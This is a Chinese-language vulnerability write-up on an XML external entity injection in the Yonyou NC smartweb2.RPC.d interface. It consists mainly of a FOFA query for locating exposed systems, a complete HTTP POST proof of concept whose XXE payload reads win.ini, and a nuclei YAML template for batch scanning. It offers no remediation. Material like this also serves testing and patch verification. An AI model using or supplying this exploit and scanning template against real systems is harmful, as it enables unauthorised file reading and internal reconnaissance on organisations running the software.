用友NC smartweb2.RPC.d XML外部实体注入漏洞
漏洞简介
用友NC系统的smartweb2.RPC.d接口存在XML外部实体注入漏洞,攻击者可以利用该漏洞进行文件读取、内网端口扫描等攻击。
漏洞复现
fofa语法:app="用友-UFIDA-NC"
登录页面如下:
POC:
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 258
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
nuclei批量yaml文件
id: yonyou_NC_XML
info:
name: NC系统的XML实体注入漏洞
author: mhb17
severity: high
description: description
reference:
-
tags: fileread
requests:
- raw:
- |+
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Connection: close
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Type: application/x-www-form-urlencoded
Host: {{Hostname}}
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 442
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
matchers-condition: and
matchers:
- type: word
part: body
words:
- for 16-bit app support
- type: word
part: header
words:
- '200'
